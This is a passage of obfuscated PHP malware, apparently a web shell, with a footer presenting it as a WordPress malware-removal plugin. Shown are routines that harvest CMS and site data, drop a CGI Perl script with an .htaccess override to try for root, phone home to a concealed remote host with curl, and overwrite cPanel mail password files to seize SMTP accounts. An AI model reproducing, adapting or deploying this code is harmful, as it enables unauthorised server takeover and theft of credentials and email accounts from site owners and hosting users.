$ubZRU++; } if ($ubZRU > 0x190) { die($GLOBALS[ð][0x108]); } } preg_match_all($GLOBALS[ð][0x10c], $Enic4, $rPfM6); if (preg_match($GLOBALS[ð][0x109], $LOmS0)) { $zDvDR = str_replace($GLOBALS[ð][0x10a], $GLOBALS[ð][0x2], $LOmS0); } else { $zDvDR = str_replace($GLOBALS[ð][0x10b], $GLOBALS[ð][0x2], $LOmS0); } $zDvDR = substr($zDvDR, 0, strpos($zDvDR, $GLOBALS[ð][0x105])); foreach ($rPfM6[0x1] as $Rd6Xn) { $qdMec++; if (preg_match($GLOBALS[ð][0x133], $Rd6Xn) || preg_match($GLOBALS[ð][0x134], $Rd6Xn)) { $kX5Kz = $Rd6Xn . $GLOBALS[ð][0x135]; } elseif (preg_match($GLOBALS[ð][0x136], $Rd6Xn)) { $kX5Kz = $GLOBALS[ð][0x137] . $zDvDR . $Rd6Xn . $GLOBALS[ð][0x138]; } else { $kX5Kz = $LOmS0 . $Rd6Xn . $GLOBALS[ð][0x139]; } $srSx9 = htmlspecialchars_decode(Fw1Ye($kX5Kz)); preg_match($GLOBALS[ð][0x13d], $srSx9, $QObCn); preg_match($GLOBALS[ð][0x118], $srSx9, $jPaTv); preg_match($GLOBALS[ð][0x17c], $srSx9, $gBiec); preg_match($GLOBALS[ð][0x116], $srSx9, $pWfU0); preg_match($GLOBALS[ð][0x17e], $srSx9, $eBwm4); preg_match($GLOBALS[ð][0x120], $srSx9, $W_7qP); preg_match($GLOBALS[ð][0x115], $srSx9, $UYuN4); preg_match($GLOBALS[ð][0x142], $srSx9, $uXJkb); preg_match($GLOBALS[ð][0x12c], $srSx9, $VknFC); preg_match($GLOBALS[ð][0x13a], $srSx9, $zERE7); preg_match($GLOBALS[ð][0x130], $srSx9, $YhDxn); preg_match($GLOBALS[ð][0x12a], $srSx9, $rhB3r); preg_match_all($GLOBALS[ð][0x146], $srSx9, $NK16o); preg_match_all($GLOBALS[ð][0x110], $srSx9, $G2S_i); preg_match_all($GLOBALS[ð][0x113], $srSx9, $QO5g8); preg_match($GLOBALS[ð][0x144], $srSx9, $Jc7_H); preg_match($GLOBALS[ð][0x112], $srSx9, $fFreY); preg_match($GLOBALS[ð][0x132], $srSx9, $KK1cF); preg_match_all($GLOBALS[ð][0x17f], $srSx9, $vV_wN); preg_match($GLOBALS[ð][0x180], $srSx9, $VVbsx); preg_match($GLOBALS[ð][0x12b], $srSx9, $O0_Gw); preg_match($GLOBALS[ð][0x17d], $srSx9, $H3Dnq); preg_match($GLOBALS[ð][0x13e], $srSx9, $qRVjf); preg_match($GLOBALS[ð][0x111], $srSx9, $I1XA9); preg_match($GLOBALS[ð][0x13c], $srSx9, $EQ0fI); preg_match($GLOBALS[ð][0x13b], $srSx9, $owSpB); preg_match($GLOBALS[ð][0x114], $srSx9, $pmwNx); preg_match($GLOBALS[ð][0x143], $srSx9, $ow9vj); preg_match($GLOBALS[ð][0x12f], $srSx9, $l5zPA); preg_match($GLOBALS[ð][0x145], $srSx9, $KTQVw); preg_match($GLOBALS[ð][0x177], $srSx9, $oDKH4); preg_match($GLOBALS[ð][0x117], $srSx9, $eZeM_); preg_match($GLOBALS[ð][0x119], $srSx9, $MQNcp); preg_match($GLOBALS[ð][0x12d], $srSx9, $lMLuB); preg_match($GLOBALS[ð][0x190], $srSx9, $TqGXu); preg_match($GLOBALS[ð][0x131], $srSx9, $tB0uO); if (!empty($lMLuB[0x1]) && !preg_match($GLOBALS[ð][0x12e], $srSx9)) { $lQymy++; } elseif (!empty($TqGXu[0x1])) { $yp2PP++; } elseif (!empty($tB0uO[0x1])) { $BU0zm++; } if (!empty($QObCn[0x1])) { echo $GLOBALS[ð][0x147] . $QObCn[0x1] . $GLOBALS[ð][0x148]; $ogEo3++; } elseif (!empty($jPaTv[0x1])) { echo $GLOBALS[ð][0x149] . $jPaTv[0x1] . $GLOBALS[ð][0x14a]; $ogEo3++; } elseif (!empty($owSpB[0x1])) { echo $GLOBALS[ð][0x14b] . $owSpB[0x1] . $GLOBALS[ð][0x14c]; $ogEo3++; } elseif (!empty($gBiec[0x1])) { echo $GLOBALS[ð][0x14d] . $gBiec[0x1] . $GLOBALS[ð][0x14e]; $ogEo3++; } elseif (!empty($pWfU0[0x1])) { echo $GLOBALS[ð][0x14f] . $pWfU0[0x1] . $GLOBALS[ð][0x150]; $ogEo3++; } elseif (!empty($eBwm4[0x1])) { echo $GLOBALS[ð][0x151] . $eBwm4[0x1] . $GLOBALS[ð][0x152]; $ogEo3++; } elseif (!empty($W_7qP[0x1])) { echo $GLOBALS[ð][0x153] . $W_7qP[0x1] . $GLOBALS[ð][0x154]; $ogEo3++; } elseif (!empty($UYuN4[0x1])) { echo $GLOBALS[ð][0x155] . $UYuN4[0x1] . $GLOBALS[ð][0x156]; $ogEo3++; } elseif (!empty($m85ZG[0x1])) { echo $GLOBALS[ð][0x157] . $m85ZG[0x1] . $GLOBALS[ð][0x158]; $ogEo3++; } elseif (!empty($uXJkb[0x1])) { echo $GLOBALS[ð][0x159] . $uXJkb[0x1] . $GLOBALS[ð][0x15a]; $ogEo3++; } elseif (!empty($VknFC[0x1])) { echo $GLOBALS[ð][0x15b] . $VknFC[0x1] . $GLOBALS[ð][0x15c]; $ogEo3++; } elseif (!empty($zERE7[0x1])) { echo $GLOBALS[ð][0x15d] . $zERE7[0x1] . $GLOBALS[ð][0x15e]; $ogEo3++; } elseif (!empty($NK16o[0x1])) { foreach ($NK16o[0x1] as $Ez2Fk) { if (!($Ez2Fk == $GLOBALS[ð][0x15f])) { echo $GLOBALS[ð][0x160] . $Ez2Fk . $GLOBALS[ð][0x161]; $ogEo3++; } } } elseif (!empty($QO5g8[0x1])) { foreach ($QO5g8[0x1] as $Ez2Fk) { if (!($Ez2Fk == $GLOBALS[ð][0x162])) { echo $GLOBALS[ð][0x163] . $Ez2Fk . $GLOBALS[ð][0x164]; $ogEo3++; } } } elseif (!empty($Jc7_H[0x1])) { echo $GLOBALS[ð][0x165] . $Jc7_H[0x1] . $GLOBALS[ð][0x166]; $ogEo3++; } elseif (!empty($fFreY[0x1])) { echo $GLOBALS[ð][0x167] . $fFreY[0x1] . $GLOBALS[ð][0x168]; $ogEo3++; } elseif (!empty($KK1cF[0x1])) { echo $GLOBALS[ð][0x169] . $KK1cF[0x1] . $GLOBALS[ð][0x16a]; $ogEo3++; } elseif (!empty($VVbsx[0x1])) { echo $GLOBALS[ð][0x16b] . $VVbsx[0x1] . $GLOBALS[ð][0x16c]; $ogEo3++; } elseif (!empty($O0_Gw[0x1])) { echo $GLOBALS[ð][0x16d] . $O0_Gw[0x1] . $GLOBALS[ð][0x16e]; $ogEo3++; } elseif (!empty($vV_wN[0x1])) { echo $GLOBALS[ð][0x16f] . $vV_wN[0x1][0x1] . $GLOBALS[ð][0x170]; $ogEo3++; } elseif (!empty($O0_Gw[0x1])) { echo $GLOBALS[ð][0x171] . $O0_Gw[0x1] . $GLOBALS[ð][0x172]; $ogEo3++; } elseif (!empty($O0_Gw[0x1])) { echo $GLOBALS[ð][0x173] . $O0_Gw[0x1] . $GLOBALS[ð][0x174]; $ogEo3++; } elseif (!empty($pmwNx[0x1])) { echo $GLOBALS[ð][0x175] . $pmwNx[0x1] . $GLOBALS[ð][0x176]; $ogEo3++; } if (!empty($G2S_i[0x1])) { $Mo0Fh = $G2S_i[0x1][0x1]; preg_match_all($GLOBALS[ð][0x181], $Mo0Fh, $yz0ZU); $yz0ZU = $yz0ZU[0x1][0]; echo $GLOBALS[ð][0x182] . $yz0ZU . $GLOBALS[ð][0x183]; $ogEo3++; } if (!empty($I1XA9[0x1])) { echo $GLOBALS[ð][0x178] . $I1XA9[0x1] . $GLOBALS[ð][0x179]; $ogEo3++; } if (!empty($EQ0fI[0x1])) { echo $GLOBALS[ð][0x17a] . $EQ0fI[0x1] . $GLOBALS[ð][0x17b]; $ogEo3++; } if (preg_match($GLOBALS[ð][0x11a], $Rd6Xn) || preg_match($GLOBALS[ð][0x11b], $srSx9)) { if (!empty($H3Dnq[0x1])) { echo $GLOBALS[ð][0x11c] . $H3Dnq[0x1] . $GLOBALS[ð][0x11d]; $ogEo3++; } elseif (!empty($qRVjf[0x1])) { echo $GLOBALS[ð][0x11e] . $qRVjf[0x1] . $GLOBALS[ð][0x11f]; $ogEo3++; } } if (!empty($oDKH4[0x1]) && !preg_match($GLOBALS[ð][0x18a], $oDKH4[0x1])) { echo $GLOBALS[ð][0x18b] . $oDKH4[0x1] . $GLOBALS[ð][0x18c]; $ogEo3++; } elseif (!empty($ow9vj[0x1]) && !preg_match($GLOBALS[ð][0x18d], $ow9vj[0x1])) { echo $GLOBALS[ð][0x18e] . $ow9vj[0x1] . $GLOBALS[ð][0x18f]; $ogEo3++; } if (!empty($eZeM_[0x1]) && !preg_match($GLOBALS[ð][0x124], $eZeM_[0x1])) { echo $GLOBALS[ð][0x125] . $eZeM_[0x1] . $GLOBALS[ð][0x126]; $ogEo3++; } elseif (!empty($l5zPA[0x1]) && !preg_match($GLOBALS[ð][0x127], $l5zPA[0x1])) { echo $GLOBALS[ð][0x128] . $l5zPA[0x1] . $GLOBALS[ð][0x129]; $ogEo3++; } if (!empty($MQNcp[0x1]) && !preg_match($GLOBALS[ð][0x184], $MQNcp[0x1])) { echo $GLOBALS[ð][0x185] . $MQNcp[0x1] . $GLOBALS[ð][0x186]; $ogEo3++; } elseif (!empty($KTQVw[0x1]) && !preg_match($GLOBALS[ð][0x187], $KTQVw[0x1])) { echo $GLOBALS[ð][0x188] . $KTQVw[0x1] . $GLOBALS[ð][0x189]; $ogEo3++; } if (!empty($pWfU0[0x1]) && preg_match($GLOBALS[ð][0x121], $srSx9)) { echo $GLOBALS[ð][0x122] . $kX5Kz . $GLOBALS[ð][0x123]; } if (!empty($eBwm4[0x1]) && preg_match($GLOBALS[ð][0x13f], $srSx9)) { echo $GLOBALS[ð][0x140] . $kX5Kz . $GLOBALS[ð][0x141]; } } $qdMec -= 0xa; if ($qdMec >= 0x2) { $qdMec /= 0x2; } if ($qdMec > $ogEo3 && trim($_POST[$GLOBALS[ð][0x10d]]) != $GLOBALS[ð][0x10e]) { echo "\n<error>404</error>"; } if ($yp2PP > 0) { echo "\n<br><wordpress>{$yp2PP}</wordpress><br>\n"; } if ($BU0zm > 0) { echo "\n<br><joomla>{$BU0zm}</joomla><br>\n"; } if ($lQymy > 0) { echo "\n<br><opencart>{$lQymy}</opencart><br>\n"; } } function FvBEN($T4JMK, $f_2D8) { mkdir($GLOBALS[ð][0x196]); $Mb5nI = $GLOBALS[ð][0x197]; global $W6Z5Y; $oxjzQ = explode($GLOBALS[ð][0x85], $_SERVER[$GLOBALS[ð][0x195]]); $Bl19g = $W6Z5Y . $_SERVER[$GLOBALS[ð][0x192]] . str_replace(end($oxjzQ), "root/{$f_2D8}", $_SERVER[$GLOBALS[ð][0x193]]); if (!file_exists("root/{$f_2D8}")) { sU59q("root/{$f_2D8}", $T4JMK); Su59q($GLOBALS[ð][0x194], "Options All\n\nAddType application/x-httpd-cgi .pl\n\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl"); chmod("root/{$f_2D8}", 0755); } return $Bl19g; } function BM1lJ() { global $XG7BU; $ghUMy = UFeQC($GLOBALS[ð][0x1ec]); if (!$ghUMy) { $urRH1 = fW1yE($GLOBALS[ð][0x1ea]); if (!preg_match($GLOBALS[ð][0x1e8], $urRH1)) { $urRH1 = fW1YE($GLOBALS[ð][0x1e9]); } $zBOmi = FvBeN($urRH1, $GLOBALS[ð][0x1eb]); $ghUMy = fW1ye($zBOmi); } if (preg_match($GLOBALS[ð][0x1ed], $ghUMy)) { echo "<root><ip>{$XG7BU}</ip><port><br>22</port><user><br>root</user><password><br>0</password></root>\n"; } else { echo "Error3-Root"; } } function IjJzN($kX5Kz, $sD1Ai) { if (preg_match($GLOBALS[ð][0x54], $sD1Ai)) { preg_match($GLOBALS[ð][0x58], $sD1Ai, $tr1Sr); $tr1Sr = $tr1Sr[0x1]; $gNjTh = SMVyq($kX5Kz . $GLOBALS[ð][0x55] . $tr1Sr); $sD1Ai = SMvyQ($kX5Kz); $a3FtC = $GLOBALS[ð][0x57]; $Q5WED = strpos($sD1Ai, $a3FtC) + strlen($a3FtC); $sD1Ai = $GLOBALS[ð][0x59] . substr($sD1Ai, $Q5WED); unlink($GLOBALS[ð][0x56]); } return $sD1Ai; } function woB4r() { $XEv3Q = $GLOBALS[ð][0x252]; global $kw7Hz; $MMvEZ = "vowe" . strtolower($XEv3Q[0x0]) . strtolower($XEv3Q[0x33]) . $GLOBALS[ð][0x1af] . strtolower($XEv3Q[0x1]) . $XEv3Q[0x12] . $XEv3Q[0x79] . $XEv3Q[0x7] . strtolower($XEv3Q[0x59]) . strtolower($XEv3Q[0x1]) . $XEv3Q[0x10]; if (function_exists($GLOBALS[ð][0x24c])) { $r2z84 = curl_init(); curl_setopt($r2z84, CURLOPT_RETURNTRANSFER, !0); curl_setopt($r2z84, CURLOPT_URL, EMGKI($GLOBALS[ð][0x24d]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x85] . emgKi($MMvEZ) . $GLOBALS[ð][0x85] . eMgKi($GLOBALS[ð][0x24e]) . $GLOBALS[ð][0x105] . EmgKI($GLOBALS[ð][0x24f]) . $GLOBALS[ð][0x250]); curl_setopt($r2z84, CURLOPT_TIMEOUT, 0x9); curl_setopt($r2z84, CURLOPT_CONNECTTIMEOUT, 0x9); curl_setopt($r2z84, CURLOPT_USERAGENT, $GLOBALS[ð][0x251]); curl_setopt($r2z84, CURLOPT_REFERER, $_SERVER[$GLOBALS[ð][0x1de]] . $kw7Hz); if (curl_exec($r2z84) != $GLOBALS[ð][0x2]) { curl_close($r2z84); return; } curl_close($r2z84); } if (function_exists($GLOBALS[ð][0x253]) && function_exists($GLOBALS[ð][0x254])) { $r2z84 = array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x255] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x256] => $GLOBALS[ð][0x257] . $_SERVER[$GLOBALS[ð][0x258]] . $kw7Hz . $GLOBALS[ð][0x259] . $GLOBALS[ð][0x25a])); file_get_contents(eMGKi($GLOBALS[ð][0x25b]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x105] . emgKI($MMvEZ) . $GLOBALS[ð][0x85] . Emgki($GLOBALS[ð][0x25c]) . $GLOBALS[ð][0x85] . EMgKI($GLOBALS[ð][0x25d]) . $GLOBALS[ð][0x25e], !1, stream_context_create($r2z84)); } return; } $YAaFV = strval(basename("/var/www/html/bkv8.txt")); $H2CpY = explode($GLOBALS[ð][0x53], $YAaFV); $YAaFV = $H2CpY[0] . $GLOBALS[ð][0x1ba]; $Wu7is = ufeqC($YAaFV); if (trim($_SERVER[$GLOBALS[ð][0x1dd]]) == $GLOBALS[ð][0x2] || $_SERVER[$GLOBALS[ð][0x1de]] == $GLOBALS[ð][0x1df] || $_SERVER[$GLOBALS[ð][0x1e0]] == $GLOBALS[ð][0x1e1] || !preg_match($GLOBALS[ð][0x1e2], strval($_SERVER[$GLOBALS[ð][0x1e3]]))) { SU59q($YAaFV, Emgki(str_rot13(emGKI($Wu7is)))); } function VZQId() { function X4gL0($O2ar5, $t0DY2) { $wmx5s = curl_init(); curl_setopt($wmx5s, CURLOPT_URL, $O2ar5); curl_setopt($wmx5s, CURLOPT_HEADER, !0); curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1); curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, $t0DY2); curl_setopt($wmx5s, CURLOPT_TIMEOUT, $t0DY2); curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0xf9]]); $xM2hz = curl_exec($wmx5s); curl_close($wmx5s); return $xM2hz; } function NrmHZ($x3Uog, $qCpsN) { if (preg_match($GLOBALS[ð][0xe5], $x3Uog)) { if ($qCpsN) { $gqcAE = A7gCN($GLOBALS[ð][0xe9]); if (!$gqcAE) { $gqcAE = FW1YE($GLOBALS[ð][0xe7]); sU59q($GLOBALS[ð][0xe8], $gqcAE); } a7Gcn($GLOBALS[ð][0xea]); a7gcn($GLOBALS[ð][0xe6]); } else { $jEIS7 = FW1Ye($GLOBALS[ð][0xed]); if (!preg_match($GLOBALS[ð][0xeb], $jEIS7)) { $jEIS7 = fW1Ye($GLOBALS[ð][0xec]); } $kX5Kz = fVbeN($jEIS7, $GLOBALS[ð][0xee]); X4gl0($kX5Kz, 0x1e); } } else { if ($qCpsN) { $gqcAE = a7GcN($GLOBALS[ð][0xef]); if (!$gqcAE) { $gqcAE = fW1yE($GLOBALS[ð][0xf2]); su59q($GLOBALS[ð][0xf3], $gqcAE); } a7gcN($GLOBALS[ð][0xf1]); A7gCn($GLOBALS[ð][0xf0]); } else { $VparV = fw1Ye($GLOBALS[ð][0xf4]); if (!preg_match($GLOBALS[ð][0xf6], $VparV)) { $VparV = fW1YE($GLOBALS[ð][0xf7]); } $kX5Kz = FvbeN($VparV, $GLOBALS[ð][0xf5]); x4Gl0($kX5Kz, 0x1e); } } echo $GLOBALS[ð][0xf8]; } $qCpsN = a7gcN($GLOBALS[ð][0xd8]); global $x3Uog; if (preg_match($GLOBALS[ð][0xd9], $x3Uog) || preg_match($GLOBALS[ð][0xda], $x3Uog) || preg_match($GLOBALS[ð][0xdb], $x3Uog) || preg_match($GLOBALS[ð][0xdc], $x3Uog) || preg_match($GLOBALS[ð][0xdd], $x3Uog) || preg_match($GLOBALS[ð][0xde], $x3Uog) || preg_match($GLOBALS[ð][0xdf], $x3Uog)) { NrMhZ($x3Uog, $qCpsN); } elseif (preg_match($GLOBALS[ð][0xe0], $x3Uog)) { if (!preg_match($GLOBALS[ð][0xe1], $x3Uog) && !preg_match($GLOBALS[ð][0xe2], $x3Uog)) { NrMhz($x3Uog, $qCpsN); } else { echo $GLOBALS[ð][0xe3]; } } else { echo $GLOBALS[ð][0xe4]; } } function D6MNI() { global $GEgR8; global $WnpSY; $z0tRT = glob("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x76], GLOB_ONLYDIR); foreach ($z0tRT as $LOmS0) { $NlktG = explode($GLOBALS[ð][0x85], $LOmS0); $u_HWU = $NlktG[count($NlktG) - 0x1]; $ghUMy = UfEqC("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x83] . $u_HWU . $GLOBALS[ð][0x84]); if (preg_match($GLOBALS[ð][0x81], $ghUMy)) { die($GLOBALS[ð][0x82]); } $LSeh6 = explode($GLOBALS[ð][0x7c], $ghUMy); unlink("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x7f] . $u_HWU . $GLOBALS[ð][0x80]); foreach ($LSeh6 as $Y0TMt) { $Y0TMt = explode($GLOBALS[ð][0x1], $Y0TMt); foreach ($Y0TMt as $mQp8f) { $CzWXh = explode($GLOBALS[ð][0x7e], $mQp8f); $mH9bZ = $CzWXh[0]; if ($mH9bZ) { $Ez2Fk = cqXAS(); $ACEox = crypt($Ez2Fk, $GLOBALS[ð][0x7d]); MiaSl("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x79] . $u_HWU . $GLOBALS[ð][0x7a], $mH9bZ . $GLOBALS[ð][0x4f] . $ACEox . $GLOBALS[ð][0x7b] . $GLOBALS[ð][0x7c]); if (!preg_match($GLOBALS[ð][0x77], $mH9bZ) && !preg_match($GLOBALS[ð][0x78], $mH9bZ)) { echo "<findersmtp>{$u_HWU}|587|{$mH9bZ}!!{$u_H
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.